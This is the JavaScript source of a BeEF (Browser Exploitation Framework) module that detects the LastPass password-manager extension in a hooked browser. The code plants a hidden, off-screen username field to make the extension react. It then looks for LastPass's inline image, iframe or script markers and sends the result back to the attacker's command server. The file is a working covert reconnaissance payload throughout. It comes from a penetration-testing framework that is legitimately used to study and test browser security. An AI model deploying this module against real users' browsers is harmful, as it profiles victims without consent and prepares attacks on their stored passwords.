Files
beef/modules/browser/detect_lastpass/command.js
2024-12-25 11:40:55 +10:00

77 lines
3.4 KiB
JavaScript

//
// Copyright (c) 2006-2025Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function () {
var result = "Not in use or not installed";
// The following base64 encoded string represents the LastPass inline PNG which is inserted into user/pass form fields
var base64PNG = "iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC";
let createInputField = function () {
beef.debug("Module - Detect LastPass: Generating input field");
return new Promise((resolve, reject) => {
var input = document.createElement("input");
input.type = "text";
input.id = "username";
input.name = "username";
input.setAttribute("style", "display:none;position:absolute;visibility:hidden;top:-1000px;left:-1000px;border:none;");
document.body.appendChild(input);
beef.debug("Module - Detect LastPass: Input field generated");
// FF requires some interaction to trigger extension function, so we use a timeout to wait 5 seconds in the hope that a user interacts
if (beef.browser.isFF()) {
setTimeout(() => {
resolve();
}, 5000);
} else {
// `1 second timout to allow DOM to update
setTimeout(() => {
resolve();
}, 1000);
}
})
}
let detectLastPass = function () {
beef.debug("Module - Detect LastPass: Looking for input field");
return new Promise((resolve, reject) => {
// Detect input form fields with the injected LastPass PNG as background image
var bginput = $j('input[style]');
var lpdiv = document.getElementById('hiddenlpsubmitdiv');
if (bginput.length > 0) {
beef.debug("Module - Detect LastPass: Input field with 'style' attribute found: " + bginput);
for (var i = 0; i < bginput.length; i++) {
beef.debug("Module - Detect LastPass: Number of potential input fields with 'style' attribute found: " + bginput.length);
var styleContent = bginput[i].getAttribute('style');
if (styleContent.includes(base64PNG)) {
beef.debug('Module - Detect LastPass: Matching inline PNG detected');
result = "Detected LastPass through presence of inline base64-encoded PNG within input form field";
}
}
// Detect presence of LastPass iframe
} else if ($j("iframe[name='LPFrame']").length > 0) {
beef.debug('Module - Detect LastPass: Matching iframe found');
result = "Detected LastPass through presence of LastPass 'save password' iframe";
// Below is the older method of LastPass detection method
} else if (typeof (lpdiv) != 'undefined' && lpdiv != null) {
result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
} else if ($j("script:contains(lastpass_iter)").length > 0) {
result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
}
resolve();
})
}
function getResult() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass=" + result);
}
createInputField().then(detectLastPass).then(getResult);
});